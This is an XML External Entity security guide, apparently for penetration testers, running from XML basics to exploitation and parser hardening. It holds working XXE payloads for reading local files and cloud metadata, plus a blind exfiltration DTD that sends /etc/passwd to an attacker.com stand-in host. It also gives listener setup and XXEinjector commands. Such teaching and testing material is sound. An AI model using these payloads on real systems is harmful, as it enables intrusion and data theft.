Security Field Guide · XML Attack Surface

XML External Entity Injection

Step-by-step from XML basics to blind XXE exploitation, SSRF, and remediation. With analogies, payloads, and assessment guidance.

01

XML Basics — Structure & Purpose

XML (eXtensible Markup Language) is a text format for storing and transporting structured data. Unlike HTML, it has no predefined tags — you invent your own.

Think of XML like a labeled shipping crate system. Every item goes in a box, the box has a label, and boxes can contain other boxes. The structure is entirely up to whoever builds the warehouse.
XML · Basic structure
<?xml version="1.0" encoding="UTF-8"?>    <!-- XML declaration -->

<order>                                     <!-- root element (exactly ONE) -->
  <customer id="42">                       <!-- element with attribute -->
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <item qty="3">Widget</item>
</order>

Key Rules

  • One root element only
  • All tags must close
  • Attribute values quoted
  • Tags are case-sensitive
  • Proper nesting required
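A parser enforces the Key Rules above before anything else happens. Here is a minimal sketch using Python's standard-library `xml.etree.ElementTree`, which raises `ParseError` for documents that break them. `is_well_formed` is an illustrative helper, not a library function.

```python
import xml.etree.ElementTree as ET

ORDER = """<?xml version="1.0" encoding="UTF-8"?>
<order>
  <customer id="42">
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <item qty="3">Widget</item>
</order>"""

def is_well_formed(text: str) -> bool:
    """Return True if ElementTree accepts the document (illustrative helper)."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False

root = ET.fromstring(ORDER)
print(root.tag, root.find("customer").get("id"), root.find("item").text)  # order 42 Widget
```

Each rule maps to a rejection: `<a/><b/>` (two roots), `<a><b></a>` (bad nesting), `<a x=1/>` (unquoted attribute), `<a></A>` (case mismatch).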

Common Uses

  • SAML / SSO tokens
  • SOAP web services
  • Office file formats (.docx, .xlsx)
  • SVG images
  • API responses (legacy)
  • Config files (Maven, Android)

Schema

A schema defines what's valid: which elements exist, what types they hold, what's required. Think of it as the blueprint the crate-builder must follow.

Formats: XSD (XML Schema Definition), DTD, RELAX NG.

02

DTD & Entities — The Dangerous Ingredients

A Document Type Definition (DTD) is an older schema format that lives either inside the XML document (internal DTD) or at a URL (external DTD). It defines allowed elements and declares entities — which is where XXE comes from.

An entity is a text macro, like a copy-paste shortcut. You declare an entity named company once, and every time the parser sees the reference &company;, it substitutes the full value. An external entity fetches that value from a URL or file at parse time.
XML · Internal DTD + entity
<!-- Internal DTD -->
<!DOCTYPE note [
  <!ENTITY author "Alice">
]>

<note>
  Written by &author;   <!-- → "Alice" -->
</note>
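To see entity substitution in action, you can feed the internal-entity example to Python's standard-library ElementTree, which uses the bundled expat parser. This is a minimal sketch. Conforming parsers are required to expand internal entities like this one.

```python
import xml.etree.ElementTree as ET

NOTE = """<!DOCTYPE note [
  <!ENTITY author "Alice">
]>
<note>Written by &author;</note>"""

# The parser replaces &author; with the value declared in the internal DTD.
note = ET.fromstring(NOTE)
print(note.text)  # Written by Alice
```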
XML · External entity (XXE vector)
<!DOCTYPE foo [
  <!ENTITY xxe
    SYSTEM "file:///etc/passwd"
  >
]>

<data>&xxe;</data>
<!-- Parser fetches /etc/passwd
     and inlines it here -->
Entity Type | Syntax | Source | XXE Risk
Internal | <!ENTITY name "value"> | Literal string in DTD | Low (but nesting enables Billion Laughs DoS)
External (file) | <!ENTITY name SYSTEM "file:///..."> | Local filesystem | Critical
External (HTTP) | <!ENTITY name SYSTEM "http://..."> | Remote URL | SSRF
Parameter entity | <!ENTITY % name SYSTEM "..."> | Used inside DTD only | Blind XXE
Character entity | &lt; &amp; | Built-in XML escaping | None
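Whether the external entity in the second example actually gets resolved depends entirely on the parser. Python's standard-library ElementTree, for example, refuses it. Its documentation states that it does not expand external entities and raises a parse error instead. The sketch below shows that behavior. `try_parse` is an illustrative helper.

```python
import xml.etree.ElementTree as ET

XXE = """<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""

def try_parse(doc: str) -> str:
    """Report whether ElementTree accepted the document (illustrative helper)."""
    try:
        return "parsed: " + (ET.fromstring(doc).text or "")
    except ET.ParseError as exc:
        # ElementTree treats the external entity reference as undefined.
        return f"rejected: {exc}"

print(try_parse(XXE))
```

Other parsers in the same process may behave differently, so this says nothing about libxml2-, Xerces- or .NET-based code.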
03

When Does Testing for XXE Make Sense?

XXE is relevant wherever an application parses XML that the attacker influences. It's easy to miss because XML is often hidden.

🎯 High-Yield Targets

  • SOAP endpoints (Content-Type: text/xml or application/soap+xml)
  • SAML SSO (SAMLResponse, AuthnRequest)
  • File upload: .docx, .xlsx, .svg, .xml
  • APIs accepting application/xml
  • RSS/Atom feed parsers

🔍 Also Check

  • JSON endpoints: switch Content-Type to application/xml, re-send the same data as XML, and compare responses
  • PDF generators (often parse SVG/XML internally)
  • Import/export features (data feeds, configs)
  • Mobile apps talking to legacy middleware

📋 Assessment Checklist

  • Identify all XML-accepting endpoints
  • Check Content-Type headers
  • Inspect file upload processing
  • Look for SAML in SSO flows
  • Test JSON endpoints with XML swap
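The "XML swap" check only works if you rewrite the JSON body as XML before changing the Content-Type. Here is a rough sketch of that conversion using only the standard library. `json_to_xml` and the `<item>` wrapper for array elements are illustrative choices. The root tag is a guess that you adjust for each endpoint.

```python
import json
import xml.etree.ElementTree as ET

def json_to_xml(body: str, root_tag: str = "root") -> str:
    """Hypothetical helper: mirror a JSON document as nested XML elements."""
    def build(parent: ET.Element, value) -> None:
        if isinstance(value, dict):
            for key, child in value.items():
                build(ET.SubElement(parent, key), child)   # one element per key
        elif isinstance(value, list):
            for item in value:
                build(ET.SubElement(parent, "item"), item)  # arrays become <item> children
        elif isinstance(value, bool):
            parent.text = "true" if value else "false"      # keep JSON spelling
        elif value is not None:
            parent.text = str(value)                        # null stays an empty element

    root = ET.Element(root_tag)
    build(root, json.loads(body))
    return ET.tostring(root, encoding="unicode")

print(json_to_xml('{"productId": 1, "storeId": 1}', root_tag="stockCheck"))
```

If the endpoint accepts the converted body, add a DOCTYPE and an entity reference as described in the file-read section.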
04

How Do XXE Vulnerabilities Arise?

XXE exists because many XML parsers (especially older versions, and Java's default JAXP factories) resolve external entities by default. It's a feature, not a bug, until untrusted input hits it.

Imagine a photocopier that can pull documents from any network share and include them in a printout. That's useful internally. But if a visitor hands you an instruction sheet that says "and include the contents of server/secret-plans.docx on page 3" — you have a problem.
  • Application receives XML

    User-controlled data arrives as XML — directly in the body, inside a SOAP envelope, or embedded in a file upload.

  • Parser processes DOCTYPE without restriction

    The XML parser (libxml2, Xerces, .NET XmlDocument, Java SAXParser, etc.) sees a <!DOCTYPE> declaration and, unless it has been hardened, processes it.

  • External entity is resolved

    The parser fetches the external resource (file, URL) and substitutes it into the document tree.

  • Substituted content ends up in the response

    If the application reflects parsed values (e.g., echoes back a field), the attacker sees the file contents. If not → Blind XXE path.

    ℹ️
    Root cause in one sentence: The application passes attacker-controlled XML to a parser that has external entity processing enabled, then uses the parsed output.
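The chain above comes down to a single parser setting. Python's `xml.sax` exposes it as the `feature_external_ges` feature, which has been off by default since Python 3.7.1. That makes it a convenient local demonstration: the sketch parses the same document twice, once hardened and once with external general entities enabled. A temporary file stands in for `/etc/passwd`. `TextCollector` and `parse_text` are illustrative names. Run this only on your own machine.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

class TextCollector(ContentHandler):
    """Collects every chunk of character data the parser reports."""

    def __init__(self) -> None:
        super().__init__()
        self.parts: list[str] = []

    def characters(self, content: str) -> None:
        self.parts.append(content)

def parse_text(doc: bytes, resolve_external: bool) -> str:
    """Parse `doc` and return its text, with external entity resolution on or off."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    # This one feature decides whether "External entity is resolved" happens.
    parser.setFeature(feature_external_ges, resolve_external)
    parser.parse(io.BytesIO(doc))
    return "".join(handler.parts)

with tempfile.TemporaryDirectory() as tmp:
    secret = Path(tmp) / "secret.txt"
    secret.write_text("s3cr3t")  # stands in for /etc/passwd
    doc = (
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{secret.as_uri()}">]>'
        "<data>&xxe;</data>"
    ).encode()
    hardened = parse_text(doc, resolve_external=False)
    vulnerable = parse_text(doc, resolve_external=True)

print(repr(hardened), repr(vulnerable))
```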
    05

    Potential Impact & Limitations

    💥 Impact

    • Local file disclosure — read /etc/passwd, app configs, SSH keys, source code
    • SSRF — probe internal network, hit cloud metadata endpoints (169.254.169.254)
    • Blind data exfil — via DNS/HTTP to attacker-controlled server
    • DoS (Billion Laughs) — nested entity expansion exhausts memory
    • RCE — rare; possible via PHP's expect:// wrapper, and only if the expect extension is installed
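The Billion Laughs arithmetic is worth spelling out. Each level references the previous one `fanout` times, so `&lolN;` expands to `len("lol") * fanout**N` characters. The sketch below builds the classic DTD and computes the expansion without parsing it. `billion_laughs_dtd` and `expanded_chars` are illustrative names. Do not feed the output to a parser you care about.

```python
def billion_laughs_dtd(levels: int = 9, fanout: int = 10) -> str:
    """Build the nested-entity DTD from the classic Billion Laughs test case."""
    decls = ['<!ENTITY lol "lol">']
    previous = "lol"
    for level in range(1, levels + 1):
        name = f"lol{level}"
        refs = f"&{previous};" * fanout  # each level references the previous one `fanout` times
        decls.append(f'<!ENTITY {name} "{refs}">')
        previous = name
    return "<!DOCTYPE lolz [\n  " + "\n  ".join(decls) + "\n]>"

def expanded_chars(levels: int = 9, fanout: int = 10, base: str = "lol") -> int:
    """Characters produced by expanding the top-level entity once."""
    return len(base) * fanout ** levels

dtd = billion_laughs_dtd()
print(len(dtd), expanded_chars())  # 751 3000000000
```

A DTD of under 1 KB expands to 3 billion characters (roughly 3 GB), which is why entity expansion limits matter even when external entities are disabled.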

    ⚠️ Limitations

    • Files containing < or & break XML parsing when inlined → need out-of-band or CDATA tricks
    • Binary files not readable (not valid XML text)
    • No response reflection → must use blind techniques
    • WAFs may block SYSTEM keyword or <!DOCTYPE
    • Many current parser versions ship with external entity resolution disabled by default
    ⚠️
    CDATA workaround for special characters: Wrap fetched content in a CDATA section via a parameter entity trick (see Blind XXE section) to handle files with XML metacharacters.
    06

    Exploit: Reading Local Files

    The classic flow: inject a DOCTYPE, define an external entity pointing to a local file, reference it in a value the app echoes back.

    1. Find an XML endpoint that reflects input

      Look for a field value in the response that mirrors something you sent. E.g., <username>Alice</username> → response contains "Alice".

    2. Inject a DOCTYPE with external entity

      Insert a DOCTYPE between the XML declaration and the root element (or replace an existing one) to declare your entity.

    3. Reference the entity in the reflected field

      Put &xxe; where the echoed value was.

    4. Read the response

      The file contents appear where the entity was referenced.

    XML · BURP · Basic file read payload
    <?xml version="1.0"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <stockCheck>
      <productId>&xxe;</productId>   <!-- reflected field -->
      <storeId>1</storeId>
    </stockCheck>
    RESPONSE (truncated) · What you get back
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...
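The four steps can be scripted. This is a minimal sketch that assumes a body shaped like the `stockCheck` example. `add_file_read_entity` is a hypothetical helper: it places the DOCTYPE after the XML declaration and replaces the reflected field's value with `&xxe;`. `build_request` is also hypothetical. It prepares a POST with `Content-Type: application/xml` but does not send it. Only send it to targets you are authorized to test.

```python
import re
import urllib.request

def add_file_read_entity(body: str, field: str, uri: str = "file:///etc/passwd") -> str:
    """Hypothetical helper: declare an external entity and reference it in `field`.

    The DOCTYPE goes after the XML declaration (if present) and before the root
    element, which is where XML requires it.
    """
    doctype = f'<!DOCTYPE foo [\n  <!ENTITY xxe SYSTEM "{uri}">\n]>\n'
    decl = re.match(r"\s*<\?xml[^>]*\?>\s*", body)
    head, rest = (body[: decl.end()], body[decl.end():]) if decl else ("", body)
    tag = re.escape(field)
    # Replace the reflected field's value with the entity reference (first match only).
    rest = re.sub(rf"<{tag}>[^<]*</{tag}>", f"<{field}>&xxe;</{field}>", rest, count=1)
    return head + doctype + rest

def build_request(url: str, body: str) -> urllib.request.Request:
    """Prepare, but do not send, a POST carrying the payload as application/xml."""
    return urllib.request.Request(
        url, data=body.encode("utf-8"), method="POST",
        headers={"Content-Type": "application/xml"},
    )

original = (
    '<?xml version="1.0"?>\n'
    "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)
payload = add_file_read_entity(original, "productId")
print(payload)
```

To send the prepared request, pass it to `urllib.request.urlopen`, then look for the file contents in the response where `productId` was echoed.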

    Other useful file targets:

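    File | What you get
    /etc/passwd | User list, shells; confirms XXE works
    /etc/hostname | Machine name; useful for SSRF targeting
    /proc/self/environ | Environment variables, often containing secrets (NUL-separated, so inline reads may fail to parse)
    /proc/self/cmdline | Running process & args (also NUL-separated)
    /root/.ssh/id_rsa, /home/<user>/.ssh/id_rsa | Private SSH key (file:// does not expand ~, so use an absolute path)
    /var/www/html/config.php | App source, DB credentials (starts with <?php, so inline reads need the CDATA trick or php://filter)
    file:///C:/Windows/win.ini | Windows confirmation payload
    file:///C:/inetpub/wwwroot/web.config | IIS config, connection strings (itself XML, so the same caveat applies)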
    07

    Exploit: SSRF via XXE

    Instead of file://, use http://. The server's XML parser makes an outbound HTTP request — from inside the network. You can probe internal services, cloud metadata APIs, or anything the server can reach.

    You're standing outside a locked building. You can't enter. But you slip a note under the door saying "call this number for me and read me what they say." XXE SSRF is exactly that: you make the server act as your proxy.
    XML · AWS metadata endpoint via SSRF
    <!DOCTYPE foo [
      <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
    ]>
    <data>&ssrf;</data>
    XML · Internal network port scan (one-by-one)
    <!-- Try systematically; timing difference reveals open vs. closed -->
    <!DOCTYPE foo [
      <!ENTITY ssrf SYSTEM "http://192.168.1.1:8080/">
    ]>
    <data>&ssrf;</data>

    High-Value SSRF Targets

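    • 169.254.169.254 — AWS metadata (IMDSv1 only; IMDSv2 needs a PUT-issued token, and GCP/Azure require a metadata header, none of which a plain XXE GET can supply)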
    • http://localhost:8080 — admin panels
    • http://internal-db:5432 — databases
    • http://elasticsearch:9200/_cat/indices
    • http://kubernetes.default.svc — k8s API

    SSRF Indicators

    • Error message mentions connection refused → port closed
    • Timeout → filtered or no route
    • HTTP 200 with content → open & responding
    • Burp Collaborator interaction → confirmed outbound
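When you probe many host:port pairs, it helps to record each outcome against the indicators above in a consistent way. This is a heuristic sketch. The `ProbeResult` fields, the 10-second timeout and the matched error strings are all assumptions. Adapt them to the target parser's error format.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class ProbeResult:
    """Outcome of one SSRF probe (one host:port). Field names are illustrative."""
    status: Optional[int]   # HTTP status returned by the vulnerable app, if any
    body: str               # response body or error text
    elapsed: float          # seconds until the app answered
    oob_hit: bool = False   # did Collaborator/interactsh log an interaction?

def classify(result: ProbeResult, timeout_s: float = 10.0) -> str:
    """Map a probe to the indicators above. Heuristic; thresholds are assumptions."""
    text = result.body.lower()
    if result.oob_hit:
        return "outbound confirmed"
    if "connection refused" in text:
        return "closed"
    if result.elapsed >= timeout_s or "timed out" in text:
        return "filtered / no route"
    if result.status == 200 and result.body.strip():
        return "open & responding"
    return "inconclusive"

print(classify(ProbeResult(500, "java.net.ConnectException: Connection refused", 0.1)))
```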
    08

    Blind XXE — Out-of-Band Exfiltration & Burp Collaborator

    When the application processes XML but never reflects values back, you need out-of-band channels. The payload triggers an outbound connection to a server you control — proving the vulnerability and potentially exfiltrating data.

    You're blindfolded. You can't see what the server reads. But you ask it to shout the file contents out the window, and you're standing outside listening. Burp Collaborator is the listener.

    Step 1 — Confirm Blind XXE with DNS ping

    XML · OOB DNS / HTTP via SYSTEM entity
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "http://YOUR.COLLABORATOR.ID.oastify.com/">
    ]>
    <data>&xxe;</data>
    
    <!-- If Collaborator gets a DNS/HTTP hit → XXE confirmed blind -->
    ℹ️
    Burp Collaborator: Burp Suite Pro → Collaborator tab → "Copy to clipboard" gives you a unique subdomain. Any DNS or HTTP requests to it appear in real time.
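If you spray Step 1 across many endpoints, a per-endpoint label in the callback hostname tells you which request caused each Collaborator hit. This is a minimal sketch. `oob_probe` is a hypothetical helper: it takes the first 12 hex characters of a SHA-256 hash of the endpoint string and prepends them to your Collaborator domain.

```python
import hashlib

def oob_probe(endpoint: str, callback_domain: str) -> tuple[str, str]:
    """Return (label, payload) for a Step 1 probe tied to one endpoint (hypothetical helper).

    The label becomes an extra DNS label, so each DNS/HTTP interaction
    names the request that triggered it.
    """
    label = hashlib.sha256(endpoint.encode("utf-8")).hexdigest()[:12]
    payload = (
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY xxe SYSTEM "http://{label}.{callback_domain}/">\n'
        "]>\n"
        "<data>&xxe;</data>"
    )
    return label, payload

label, payload = oob_probe("POST /api/import", "YOUR.COLLABORATOR.ID.oastify.com")
print(label, payload, sep="\n")
```

Keep a `{label: endpoint}` map while testing, then look up the label from each interaction's hostname.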

    Step 2 — Exfiltrate file data via parameter entities + external DTD

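    The XML spec forbids parameter-entity references inside markup declarations in the internal DTD subset, so you can't build the exfiltration entity there. Instead, host a malicious DTD on your server and load it with a parameter entity; inside an external DTD, that nesting is allowed.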

    XML · SEND TO TARGET · Step 2a — Payload
    <!DOCTYPE foo [
      <!ENTITY % dtd
        SYSTEM "http://attacker.com/evil.dtd">
      %dtd;
    ]>
    <data>anything</data>
    DTD · HOST ON ATTACKER SERVER · Step 2b — evil.dtd
    <!ENTITY % file
      SYSTEM "file:///etc/passwd">
    <!-- &#x25; is an escaped "%": a bare % inside an entity value is not well-formed -->
    <!ENTITY % exfil
      "<!ENTITY &#x25; send
        SYSTEM 'http://attacker.com/?x=%file;'>">
    %exfil;
    %send;
    ⚠️
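    Limitation: File contents containing < or & break parsing, and some parsers (e.g., recent Java versions) reject newlines in the callback URL, so multi-line files such as /etc/passwd may never arrive over HTTP. Options: the CDATA trick (a second parameter entity that wraps the file read in <![CDATA[ ... ]]>) for metacharacters, an FTP-based exfil listener for multi-line files, or, on PHP targets, php://filter/convert.base64-encode/resource=/etc/passwd to encode the file before it is sent.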

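    Step 3 — Error-based XXE (no callback channel needed)

    DTD · evil.dtd · Trigger parse error containing file contents
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % error
      "<!ENTITY &#x25; boom SYSTEM 'file:///nonexistent/%file;'>">
    %error;
    %boom;
    
    <!-- Loading the nonexistent path fails, and the parser's error message
         includes that path, i.e. the file contents. Visible when the app
         returns verbose errors (e.g., in a 500 response). The target still
         has to load evil.dtd, either from your server or by repurposing a
         DTD that already exists on its filesystem. -->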
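Both external DTDs follow the same template, so one function can render either of them. This sketch assumes `http://attacker.com/` as the callback and an absolute Unix path for the target file. `evil_dtd` is a hypothetical helper. It writes the inner `%` as `&#x25;`, because a bare `%` inside an entity value is not well-formed XML.

```python
def evil_dtd(target_file: str, mode: str, callback: str = "http://attacker.com/") -> str:
    """Render an external DTD for blind XXE (hypothetical helper).

    mode="oob":   send the file contents to `callback` as the x= query parameter.
    mode="error": reference a nonexistent path that embeds the contents, so the
                  parser's "file not found" error leaks them.
    """
    file_decl = f'<!ENTITY % file SYSTEM "file://{target_file}">'
    if mode == "oob":
        # &#x25; turns into '%' when the outer entity is declared
        inner = f"<!ENTITY &#x25; send SYSTEM '{callback}?x=%file;'>"
        return "\n".join([file_decl, f'<!ENTITY % exfil "{inner}">', "%exfil;", "%send;"])
    if mode == "error":
        inner = "<!ENTITY &#x25; boom SYSTEM 'file:///nonexistent/%file;'>"
        return "\n".join([file_decl, f'<!ENTITY % error "{inner}">', "%error;", "%boom;"])
    raise ValueError(f"unknown mode: {mode!r}")

print(evil_dtd("/etc/passwd", "oob"))
```

Save the output as evil.dtd in the directory your C&C server serves.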
    09

    XXE Without Modifying DOCTYPE — XInclude & SVG

    Sometimes you can't inject a DOCTYPE — because you control only part of the XML (e.g., a value inside a SOAP message), or the server regenerates the DOCTYPE. Two alternatives:

    XML · XInclude — inject into a value field
    <!-- No DOCTYPE needed.
         XInclude uses a namespace. -->
    <foo
      xmlns:xi="http://www.w3.org/2001/XInclude">
      <xi:include
        parse="text"
        href="file:///etc/passwd"/>
    </foo>
    ℹ️
    Works when a value you control ends up inside an XML document that the server then processes with XInclude enabled. parse="text" is key: without it, the parser tries to parse the included file as XML.
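XInclude only works if the server actually runs an XInclude processing step, and Python's standard library shows this clearly. `ET.fromstring` leaves `xi:include` untouched, and nothing is read until `xml.etree.ElementInclude.include()` is called. The stdlib default loader opens `href` as a local path rather than a URL, so this sketch uses a plain path to a temporary file that stands in for `/etc/passwd`.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from xml.etree import ElementInclude
from xml.sax.saxutils import quoteattr

with tempfile.TemporaryDirectory() as tmp:
    secret = Path(tmp) / "secret.txt"
    secret.write_text("s3cr3t")  # stands in for /etc/passwd
    doc = (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include parse="text" href={quoteattr(str(secret))}/>'
        "</foo>"
    )
    root = ET.fromstring(doc)
    before = root.text            # plain parsing leaves xi:include untouched
    ElementInclude.include(root)  # explicit XInclude step reads the file as text
    after = root.text

print(repr(before), repr(after))
```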
    SVG Upload · XXE via SVG image upload
    <?xml version="1.0"?>
    <!DOCTYPE svg [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <svg
      xmlns="http://www.w3.org/2000/svg">
      <text y="20">&xxe;</text>
    </svg>
    
    <!-- Upload as .svg / image/svg+xml
         Content may appear rendered in browser
         or in response if fetched directly -->
    Scenario | Technique | Requirement
    Full XML body control | Classic DOCTYPE injection | Parser allows external entities
    Control a value inside XML | XInclude | Server supports XInclude processing
    File upload (image) | SVG with DOCTYPE | Server parses SVG as XML
    DOCX/XLSX upload | Modify embedded XML parts | Server opens/processes the file
    JSON that becomes XML | Content-Type swap + classic | Backend converts JSON→XML
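For the DOCX/XLSX row, "modify embedded XML parts" means unzipping the file, editing a part such as `word/document.xml` and zipping it back up. This sketch uses `zipfile`. `inject_into_office_file` is a hypothetical helper. The default DOCTYPE uses a parameter entity (`%xxe;`), so the callback fires during DTD processing without any change to the document body. Replace the Collaborator placeholder with your own domain.

```python
import io
import zipfile

# Parameter entity: fetched while the DTD is processed, no &xxe; needed in the body.
DOCTYPE = (
    '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
    '"http://YOUR.COLLABORATOR.ID.oastify.com/"> %xxe;]>'
)

def inject_into_office_file(data: bytes, part: str = "word/document.xml",
                            doctype: str = DOCTYPE) -> bytes:
    """Hypothetical helper: copy a DOCX/XLSX archive, inserting `doctype`
    into `part` right after its XML declaration."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            content = src.read(info.filename)
            if info.filename == part:
                text = content.decode("utf-8")
                # The DOCTYPE must follow the XML declaration, if there is one
                cut = text.find("?>") + 2 if text.startswith("<?xml") else 0
                content = (text[:cut] + doctype + text[cut:]).encode("utf-8")
            dst.writestr(info, content)  # keeps each entry's name and compression
    return out.getvalue()
```

For XLSX, pass a part such as `part="xl/workbook.xml"`.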
    10

    Exploiting XXE with C&C Infrastructure & Tooling

    For blind XXE exfiltration in real engagements, you need an attacker-controlled server for hosting external DTDs and receiving callbacks. Here's a practical workflow using typical ERNW tooling.

    Infrastructure Setup

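    BASH · C&C Server · Serve evil.dtd + log incoming requests
    # Minimal: serve the current directory (put evil.dtd in it); port 80 needs root.
    # Every request, including ?x=... exfil callbacks, is logged to stderr.
    python3 -m http.server 80
    
    # Or: serve evil.dtd and print each request path on its own line
    # (append "| tee hits.log" to keep a copy of the [HIT] lines on disk)
    python3 -c "
    import http.server
    class H(http.server.SimpleHTTPRequestHandler):
        def do_GET(self):
            print(f'[HIT] {self.path}', flush=True)
            super().do_GET()  # serves files from the current directory, 404 otherwise
    http.server.HTTPServer(('', 80), H).serve_forever()
    "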
    BASH · C&C Server · Capture DNS exfil with tcpdump or interactsh
    # Listen for DNS queries (the NS record for attacker.com must point here)
    # -l line-buffers tcpdump output so grep sees each query immediately
    tcpdump -l -i eth0 -n udp port 53 | grep attacker.com
    
    # Or use interactsh-client (open-source Burp Collaborator alternative)
    interactsh-client -v
    # prints a domain such as abc123.oast.fun; use it as your callback domain

    Tooling Overview

    Tool | Use Case | Notes
    Burp Suite Pro | Intercept, modify, replay XML; Collaborator for blind OOB | Go-to for manual XXE
    Burp Collaborator | DNS/HTTP callback server, auto-correlated | Built into Burp Pro; use oastify.com domains
    interactsh | Open-source Collaborator alternative | interactsh-client CLI
    XXEinjector | Automated XXE file enumeration & OOB exfil | Ruby; good for bulk file reads
    xmllint | Parse & test DTD structure locally | xmllint --noent payload.xml
    Python requests | Scripted payload delivery | Set Content-Type: application/xml

    Full Blind Exfil Workflow

  • Host evil.dtd on C&C

    Place evil.dtd on your C&C server. It reads the target file and sends its contents to your listener as a URL parameter.

  • Send trigger payload to target

    XML body references http://c2.attacker.com/evil.dtd via a parameter entity. Target fetches the DTD.

  • Target evaluates DTD, reads file, sends callback

    Your listener receives GET /?x=root:x:0:0:...%0Adaemon:.... URL-decode the x parameter to get the file.

  • Automate with XXEinjector for bulk reads

    ruby XXEinjector.rb --host=c2.attacker.com --file=/burp_request.txt --path=/etc/ --oob=http
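The decoding step of this workflow is easy to get subtly wrong, because `parse_qs` turns `+` into spaces and splits on `&`. This sketch instead takes everything after the `x=` parameter (the name used in evil.dtd) and percent-decodes it with `urllib.parse.unquote`. `decode_exfil` is a hypothetical helper, and it assumes the payload is the only query parameter.

```python
from typing import Optional
from urllib.parse import unquote, urlsplit

def decode_exfil(request_path: str, param: str = "x") -> Optional[str]:
    """Recover file contents from a logged callback path such as '/?x=root:x:0:0...'.

    Takes everything after 'x=' verbatim and percent-decodes it, so literal '+'
    and '&' from the file survive (parse_qs would turn '+' into spaces).
    """
    query = urlsplit(request_path).query
    prefix = param + "="
    if not query.startswith(prefix):
        return None  # e.g. the request that fetched evil.dtd itself
    return unquote(query[len(prefix):])

print(decode_exfil("/?x=root:x:0:0:root:/root:/bin/bash%0Adaemon:x:1:1"))
```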

    11

    Prevention

    Primary fix: disable external entity processing in your XML parser. Everything else is defense-in-depth.

    1. Disable External Entities

    Configure your XML parser to reject external entities and DTD processing. This is the direct fix.

    2. Use Safe Data Formats

    Prefer JSON for APIs: no DTDs, no entities, less attack surface. YAML avoids XXE but brings its own risks (alias expansion, unsafe loaders). Only use XML where necessary.

    3. Server-Side Input Validation

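    Reject documents that contain a DOCTYPE declaration unless you need one, and validate the parsed document against the expected schema. Schema validation alone does not stop XXE: entities are resolved during parsing, whether or not the document later passes validation.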

    4. Patch & Keep Libraries Current

    XML parser libraries regularly patch XXE-related issues. Run npm audit, OWASP Dependency-Check (e.g., mvn org.owasp:dependency-check-maven:check), etc. regularly.
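Principle 3's "reject DOCTYPE unless required" can be enforced before the real parse. defusedxml does this with `forbid_dtd=True`. The sketch below shows the same idea using only the standard library: it stops expat at the first DOCTYPE. `reject_doctype` and `safe_fromstring` are hypothetical helper names.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class DoctypeForbidden(ValueError):
    """Raised when an incoming document carries a DOCTYPE declaration."""

def reject_doctype(data: bytes) -> None:
    """Scan `data` with expat and abort at the first DOCTYPE (hypothetical helper)."""
    scanner = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not accepted")

    scanner.StartDoctypeDeclHandler = on_doctype
    # An exception raised inside a handler stops parsing and propagates from Parse().
    scanner.Parse(data, True)

def safe_fromstring(data: bytes) -> ET.Element:
    """Parse only documents without a DOCTYPE."""
    reject_doctype(data)
    return ET.fromstring(data)
```

Documents without a DOCTYPE are parsed twice under this approach (one scan, then the real parse). That trade-off is usually acceptable for request-sized bodies.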

    Parser-Specific Hardening

    Language / Parser | Safe Configuration
    Java (SAXParserFactory) | factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
    Java (DocumentBuilderFactory) | factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); FEATURE_SECURE_PROCESSING alone depends on the JAXP implementation
    Python (lxml) | etree.XMLParser(resolve_entities=False, no_network=True)
    Python (defusedxml) | Drop-in safe replacement: import defusedxml.ElementTree as ET
    .NET (XmlReader) | new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit }
    PHP (libxml) | libxml_disable_entity_loader(true) on PHP < 8.0; deprecated in 8.0+, where external entity loading is off by default. Never pass LIBXML_NOENT
    Node.js (node-expat / libxmljs) | libxmljs: keep noent off (noent: true substitutes entities); prefer sax or other parsers without DTD support
    Ruby (Nokogiri) | Keep the default parse options (they include NONET); never add NOENT or DTDLOAD, which enable entity substitution and external DTD loading
    PYTHON · Safe XML parsing with defusedxml
    # pip install defusedxml
    import defusedxml.ElementTree as ET
    
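    # Entity declarations (XXE, Billion Laughs) raise defusedxml.EntitiesForbidden;
    # ElementTree never processes XInclude unless you call ElementInclude yourself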
    tree = ET.parse("user_input.xml")    # safe drop-in
    root = tree.getroot()
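    JAVA · Secure SAX parser setup
    import javax.xml.parsers.SAXParser;
    import javax.xml.parsers.SAXParserFactory;
    
    // setFeature/newSAXParser throw checked exceptions: handle or declare them
    SAXParserFactory factory = SAXParserFactory.newInstance();
    // Primary defense: any DOCTYPE makes parsing fail
    factory.setFeature(
      "http://apache.org/xml/features/disallow-doctype-decl", true
    );
    // Defense in depth if DOCTYPEs ever have to be re-enabled
    factory.setFeature(
      "http://xml.org/sax/features/external-general-entities", false
    );
    factory.setFeature(
      "http://xml.org/sax/features/external-parameter-entities", false
    );
    factory.setFeature(
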